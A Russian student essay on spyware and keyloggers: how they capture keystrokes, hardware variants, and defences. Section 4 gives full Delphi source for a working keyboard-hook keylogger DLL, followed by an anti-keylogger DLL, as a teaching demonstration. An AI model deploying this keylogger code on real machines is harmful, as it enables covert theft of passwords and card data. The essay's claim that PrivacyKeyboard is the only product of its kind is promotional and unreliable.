Размещено на http://allbest.ru

Введение

В настоящее время наиболее широкое распространение получили аппаратные устройства, а также программное обеспечение, скрытно отлеживающее деятельность пользователей персональных компьютеров.

Наиболее опасными являются мониторинговое ПО и аппаратные устройства, скрытно и несанкционированно устанавливаемые без ведома администратора либо пользователя на персональный компьютер. Как правило, ПО либо аппаратные устройства такого типа устанавливаются дистанционно.

Санкционированное программное обеспеченное и аппаратные устройства устанавливаются службой безопасности для обеспечения контроля безопасности сети. Они позволяют отслеживать действия пользователей, а так же идентифицировать процессы. Это позволяет контролировать сотрудников в соблюдении правил безопасности организации либо политики безопасности при работе на компьютерах.

Использование мониторинговых программ дает администратору сети следующие возможности:

- Локализовать случаи попыток несанкционированного доступа к информации, а так же указать время и рабочее место, с которого осуществлялась попытка.

- Отследить несанкционированно установленное программное обеспечение.

- Контролировать использование ПК.

- Отследить случаи использования модемов в локальной сети.

- Отследить случаи набора на клавиатуре слов и словосочетаний, подготовки документов, передача которых третьим лицам может грозить предприятию материальным ущербом.

- Контролировать доступ к персональным компьютерам и серверам.

- Контролировать собственных детей при использовании сети Интернет.

- Исследовать и расследовать компьютерные инциденты.

- Контролировать загрузку рабочих мест предприятия.

- Восстанавливать информацию после сбоя компьютерных систем.

Установка несанкционированных программ дает возможность злоумышленнику:

- Перехватывать информацию.

- Осуществлять шпионаж.

- Получать доступ к системам «банк-клиент».

- Получать доступ к системам криптографии пользователя ПК - к парольным фразам, а так же к закрытым и открытым ключам.

- Получать авторизационные данные кредитных карточек и т.д.

Регистрация нажатия клавиш - одна из функций устройств-кейлоггеров и программ-шпионов. При наборе пользователем логина и пароля либо данных кредитной карты, может быть записано каждое нажатие клавиш, а так же современные программы-шпионы способны считывать текст с открытых окон даже если вы его не набирали, а просто открыли для просмотра. Более того программы-шпионы умеют делать скриншоты (снимки с экрана).

1. Общие сведения

Spyware - программы, записывающие информацию о поведении пользователя в сети Интернет и отправляющие ее своему создателю. Такие приложения обычно попадают на ПК в качестве бесплатного программного обеспечения, представленного различными рекламными баннерами, online-игры, различные download-менеджеры, порно-сайты и т.д. Spyware-программы в основном представляют опасность браузеру Microsoft Internet Explorer, пользователям же современных браузеров опасности не представляют. Современные Spyware-приложения, такие как “Drive-by downloads” попадают на ПК без ведома пользователя, обычно при посещении web-сайтов либо при открытии заархивированных файлов, а так же при нажатии на всплывающие окна, содержащие в себе элемента Java Applet, ActiveX и т.п.

Чаще всего программы шпионы загружаются в компьютер вместе с каким-нибудь полезным программным обеспечением, скачиваемым из Интернета либо устанавливаемым с CD-диска и других носителей. В большинстве случаев программы попадают на ПК легально, так как пользователь, не читая условия лицензионного, дает разрешение на установку продукта.

Adware- рекламное программное обеспечение навязывающее пользователю просмотр рекламы, на протяжении запуска программы. Приложения такого типа загружаются вместе с бесплатным программным обеспечением или при просмотре web-сайтов.

Dialers- программы дозвона, служащие для подключения ПК к какому-либо платному сервису. В результате пользователю приходит счет за пользование сервисом, о котором пользователь не подозревал.

2. Клавиатурные шпионы

Клавиатурные шпионы (Keyboard Logger, KeyLogger, кейлоггер)- программы, служащие для записи информации о нажимаемых клавишах. Современные шпионы не просто записывают информацию о нажимаемых клавишах, но и привязывают ввод с клавиатуры к текущему окну. Так же они могут отслеживать открытые приложения, делать скриншоты (снимки с экрана), следят за содержимым буфера обмена, решать многие другие задачи. Собранные данные сохраняются на диске, либо отправляется отчет по электронной почте или протоколам FTP и HTTP.

В настоящее время существует огромное количество программ- кейлоггеров. Они не представляют опасности для системы, но для пользователя опасны, так как с помощью него можно заполучить конфиденциальную информацию и пароли.

2.1 Использование методики ловушек

Применение ловушек (hook) является классической методикой клавиатурных шпионов. Ловушки дают возможность наблюдать за сообщениями, обрабатываемыми окнами других программ. Установку и удаление ловушек производят при помощи документированных функций (SetWindowsHookEx-установить ловушку, UnhookWindowsHookEx-снять ловушку) библиотеки user32.dll. Существует два вида ловушек: WH_KEYBOARD - для регистрации событий клавиатуры и WH_MOUSE - регистрации событий мыши. Обработчик событий должен хранить в DLL, так как он проецируется системой в адресное пространство GUI- процессов. Следует отметить, что проецирование DLL выполняется при получение первого сообщения GUI-процессом.

В методике ловушек существует ряд недостатков. Основным является то, что DLL проецируется в адресное пространство GUI-процессов, а это может служить для обнаружения клавиатурного шпиона. Регистрация событий ввода клавиатуры возможна только для GUI, что легко проверяется демонстрационной программой.

2.2 Использование методики опроса клавиатуры

Принцип этой методики заключается в периодическом опросе состояния клавиатуры, использующую специальную функцию GetKeyboardState. Данная функция возвращает массив из 255 байт, где каждый из них содержит информацию об определенной клавише на клавиатуре. Недостатком является необходимость периодического опроса состояний клавиш со скоростью не менее 10-20 раз в секунду.

2.3 Аппаратные устройства

Аппаратные клавиатурные шпионы - это устройства, могут быть прикреплены между клавиатурой и компьютером либо встроен внутрь клавиатуры. Они способны записывать сотни символов вводимых с клавиатуры, в том числе логины и пароли, данные кредитных карт, почтовые реквизиты.

Клавиатурные шпионы не требуют установки каких-либо дополнительных программ. Такие устройства содержат внутри энергонезависимую память и могут сохранять до 10 миллионов нажатий клавиш. Как правило, такие устройства длительное время остаются незамеченными, так как имеют слишком маленькие размеры, но они требуют постоянного физического доступа. В настоящее время наиболее распространены следующие кейлоггеры: KeyKatcher, KeyGhost, MicroGuard, Hardware KeyLogger. Производящиеся компаниями Alien Concepts, Inc, Amecisco, KeyGhost Ltd, MicroSpy. Аппаратные шпионы делятся на: внутренние и внешние.

Внутренние кейлоггеры- это устройство со встроенным аппаратным модулем перехвата нажатий клавиш в корпус клавиатуры. Представляет собой небольшое устройство, внедряемое в разрыв шнура клавиатуры, встроенное в корпус клавиатуры. Потому они слишком сложно обнаруживаются и обезвреживаются.

Внешние- подключаются между клавиатурой и компьютером, выглядят обычно как оборудование для персонального компьютера. Они не требуют ни батарей, ни программ, и способны работать на любом компьютере.

Рис. 1. Места установки аппаратных кейлоггеров.

- Закладка устройства внутри клавиатуры.

- Бесконтактное считывающее устройство.

- Установка аппаратного кейлоггера в разрыв кабеля клавиатуры.

- Закладка устройства внутри системного блока.

- Съем при помощи акустических и электромагнитных излучений.

2.4 Кейлоггер на базе драйвера

Этот метод является наиболее эффективным описанным выше. Два варианта установки: установка своего драйвера вместо стандартного, и установка драйвера-фильтра. Принцип работы такого шпиона заключается в установке драйвера, который подключается в качестве фильтра к основному драйверу клавиатуры. Драйвер фильтр может быть установлен при помощи приложения, которое либо самоуничтожается, либо принимает, обрабатывает и отправляет данные.

3. Методы борьбы со шпионами

3.1 Методы борьбы со шпионским ПО

Для того чтобы обнаружить и удалить несанкционированное мониторинговое программное обеспечение используются множество программ, использующих сигнатурные базы, но обнаружить и удалить они могут только то шпионское ПО, образец которых храниться в сигнатурной базе. По такому принципу работают все производители антивирусного программного обеспечения.

Но существуют и программы-шпионы другого типа, так называемые неизвестные программы шпионы, представляющие большую опасность для автоматизированных систем. Таких существует пять типов:

- Шпионское программное обеспечение, разрабатываемое под контролем правительственных организаций.

- Шпионы, создаваемые разработчиками различных операционных систем и включаемые в состав ядра операционных систем.

- Шпионы, созданные в ограниченном количестве, для решения конкретной задачи. Как правило - это программы с видоизмененной сигнатурой.

- Коммерческие и корпоративные программные продукты, редко вносящиеся в сигнатурные базы.

- Шпионы, представляющие собой keylogging-модули, которые включаются в состав вирусных программ. До тех пор пока не внесены сигнатурные данные в вирусную базу, модули являются неизвестными.

Шпионские программы первого и третьего типа не могут обнаруживаться программами, использующими сигнатурный анализ, так как информация о них нигде не распространяется и их код не может быть внесен в сигнатурные базы.

Шпионские программы второго типа тоже не могут обнаруживаться так как они работают на уровне ядра ОС и информация о них не распространяется.

Четвертый тип очень редко вносится в сигнатурные базы, потому что это противоречит законодательству многих стран. Но даже когда это происходит, то остановить деятельность, а тем более удалить их практически не возможно без нарушения операционной системы. Поскольку они не имеют своих процессов, то прячутся в системные процессы в виде потоков. Так же они умеют самовосстанавливаться после сбоев, контролировать целостность, способны работать только с памятью не трогая жесткий диск.

Внесение в сигнатурные базы шпионов пятого типа происходит через несколько часов или дней, но за это время информация пользователя ПК уже может быть украдена и отправлена злоумышленнику.

Для защиты персонального компьютера от шпионов, разумно использовать комплексные меры защиты, т.е. несколько программных продуктов:

- Программный продукт с непрерывной защитой, не использующим сигнатурные базы, а использующий эвристические механизмы защиты, которые создаются опытными специалистами в борьбе с программами шпионами.

- Антивирус, постоянно обновляющий сигнатурные базы.

- Firewall, который контролирует выход в интернет, на основании установок пользователя.

Антивирус реагирует на проникновение вируса с keylogging модулем, но после того как информация уже была перехвачена, так как сигнатурные базы не успели пополниться и обновиться на ПК.

Firewall задает слишком много вопросов, на которые можно не правильно ответить, и тем самым ошибочно его сконфигурировать. Более того многое мониторинговое ПО, использует стандартные программы для выхода в Интернет, такие как почтовые клиенты и браузеры. А это значит, что информация, которая была перехвачена при бездействии антивируса, будет отправлена злоумышленнику.

Программный продукт первого типа работает непрерывно, в фоновом режиме, выполняя свою работу не задавая лишних вопросов. Такой продукт является единственным на сегодняшний день, под названием PrivacyKeyboard™.

Антивирусное ПО, постоянно обновляющее свои сигнатурные базы: AVP, AVZ, Dr.Web, Panda Antivirus, Norton Antivirus, и прочие. Межсетевые экраны: Norton Internet Security, BlackICE Defender, GuardianPro Firewall, Tiny Personal Firewall и другие.

PrivacyKeyboard™ блокирует работу шпионов, благодаря алгоритмам способным отличить работу шпиона от любого другого приложения в системе.

PrivacyKeyboard™ имеет в составе модели, которые обеспечивают защиту от:

- Перехвата нажатий клавиш;

- Перехвата текста окон;

- Снятия изображения рабочего стола и активных окон;

Так же PrivacyKeyboard™ имеет собственную защиту от разрушения шпионами, систему контроля целостности и другие функции защиты.

Методы борьбы с аппаратными клавиатурными шпионами:

- Физический поиск и устранение;

- Использование виртуальных клавиатур при вводе конфиденциальной информации.

3.2 Организационные методы защиты

В настоящее время шпионское программное обеспечение занимает второе место в списке угроз безопасности сети, после троянских программ и сетевых червей.

Не одно антивирусное программное обеспечение не дает абсолютной защиты сети, даже в том случае если сеть является замкнутой. Потому что шпионское программное обеспечение может попасть в сеть с любым другим разрешенным программным обеспечением.

Поэтому главным методом борьбы является «воспитание» пользователей, до тех пор пока они не поймут того, что при установке любого программного обеспечения нужно обязательно ознакомиться с лицензионным соглашением, будь то полезное программное обеспечение либо развлекательного характера. Пользователи хорошо должны представлять риски и финансовый ущерб, наносимый шпионским программным обеспечением.

Виды последствий атак шпионского программного обеспечения:

- Задействование вычислительных ресурсов сети;

- Снижение пропускной работы сети;

- Снижение продуктивности работы пользователей;

- Загрузка вредоносного программного обеспечения;

- Вмешательство в частную жизнь;

3.3 Программные средства защиты

Сейчас существует множество программ для обнаружения и удаления шпионского программного обеспечения. Выбор осуществляется масштабом сети предприятия и стоимостью антишпионского программного обеспечения. Для небольших предприятий лучше использовать антишпионское ПО независимых поставщиков, при хороших функциональных возможностях они имеют невысокую стоимость.

Для компаний в которых существует сложная сетевая инфраструктура, нерационально использовать антишпионское ПО независимых поставщиков, так как возникает проблема интеграции продукта с системой управления, а дополнительные консоли снижают время реагирования на инциденты безопасности. Все это повышает стоимость обслуживания сети. Сложная сеть требует антишпионское и антивирусное ПО, интегрируемое в систему безопасности. Для использования единых инструментов управления. Многие крупные разработчики антивирусного ПО предлагают свои продукты антишпионского ПО, встроенные в пакет антивирусного ПО и отдельными программными продуктами.

3.4 Программные продукты для обнаружения и удаления клавиатурных шпионов

Клавиатурные шпионы могут находиться любыми антивирусными программными продуктами, но так как шпионы не являются вирусами, пользы от антивируса мало.

Существуют специальные утилиты для поиска и удаления клавиатурных шпионов. Они являются наиболее эффективными, так как могут находить любые разновидности шпионов. Такие утилиты используют эвристические и сигнатурные механизмы поиска, например, утилита AVZ.

мониторинговый антивирусный персональный компьютер

4. Защита на практике

В данном примере будет показано, как при помощи библиотек DLL прекратить работу простого Кейлоггера на основе функции SetWindowsHookEx.

Для начала запишем код простого Кейлоггера.

library kl;

Uses

Windows, Messages;

Var

hook:HHook = 0;

Procedure WriteLog(const log: PChar);

Var

hFile: THandle;

dwError: DWord;

buf: array[0..1] of Char;

dwWritten: DWord;

Begin

hFile := CreateFile(PChar('kl'), GENERIC_WRITE, 0, nil, OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0);

Try

If (hFile <> INVALID_HANDLE_VALUE) Then

Begin

dwError := SetFilePointer(hFile, 0, nil, FILE_END);

If (dwError <> $FFFFFFFF) Then

Begin

WriteFile(hFile, log^, length(log), dwWritten, nil);

buf[0] := #13;

buf[1] := #10;

WriteFile(hFile, buf, 2, dwWritten, nil);

End;

End;

Finally

CloseHandle(hFile);

End;

End;

Function HookProc(nCode: LongInt; wParam, lParam: LongInt): LongInt stdcall;

Var

lpszName: Array[0..255] Of Char;

Begin

If (nCode = HC_ACTION) And ((lParam shr 31) = 1) Then

Begin

GetKeyNameText(lParam, @lpszName, $FF);

WriteLog(PChar(@lpszName));

End;

Result := CallNextHookEx(Hook, nCode, wParam, lParam);

End;

procedure sethook(flag:bool);export; stdcall;

begin

if flag then

hook := SetWindowsHookEx(WH_KEYBOARD, @HookProc, hInstance, 0)

else

begin

unhookwindowshookex(hook);

hook:=0;

end;

end;

exports sethook;

begin

end.

Данный Кейлоггер считывает нажатие клавиш и записывает в файл.

Антикейлоггер это .exe приложение, которое устанавливает Hook с помощью функции SetWindowsHookEx и использует DLL. В отличие от кейлоггера Hook устанавливается не в WH_KEYBOARD, а на WH_DEBUG. WH_DEBUG это фильтр через который происходят вызовы связанные с другими типами фильтров.

library akl;

Uses

Windows;

Var

hook:HHook = 0;

Function DebugProc(nCode: LongInt; wParam, lParam: LongInt): LongInt stdcall;

Begin

If (nCode = HC_ACTION) Then

Begin

If (wParam = WH_KEYBOARD) Then

Begin

Result := 1;

Exit;

End;

End;

Result := CallNextHookEx(Hook, nCode, wParam, lParam);

End;

procedure sethook(flag:bool);export; stdcall;

begin

if flag then

hook := SetWindowsHookEx(WH_DEBUG, @DebugProc, hInstance, 0)

else

begin

unhookwindowshookex(hook);

hook:=0;

end;

end;

exports sethook;

begin

end.

Заключение

В настоящее время количество spyware-приложений становиться все больше, в связи с этим наблюдается все больше WEB-сайтов и злоумышленников, которые извлекают выгоду при установке шпионов и краже конфиденциальной информации.

Поэтому нужно хорошо понимать всю серьезность ситуации и уметь защищаться от нежелательного программного обеспечения. Во-первых, следует использовать современные, альтернативные браузеры такие как Google Chrome, Fire Fox, Opera и др. Во-вторых нужно регулярно осуществлять профилактику персонального компьютера при помощи специального антишпионского программного обеспечения и антивирусов поддерживающих обнаружение и удаление программ-шпионов.

Клавиатурный шпион хоть и не представляет опасности для компьютера, но для пользователя слишком опасны. Они позволяют завладеть конфиденциальными данными пользователя, в том числе паролями и данными кредитных карт. При использовании кейлоггера в сочетании с RootKit-технологией, маскирующей присутствие шпиона, он становиться еще опаснее.

Для защиты информации следует следить не только за персональными компьютерами, но и локальной сетью в которой они находятся. В первую очередь этим должны заниматься сотрудники службы безопасности, а так же пользователи, которые должны быть проинструктированы и знать правила политики безопасности.

Размещено на Allbest.ru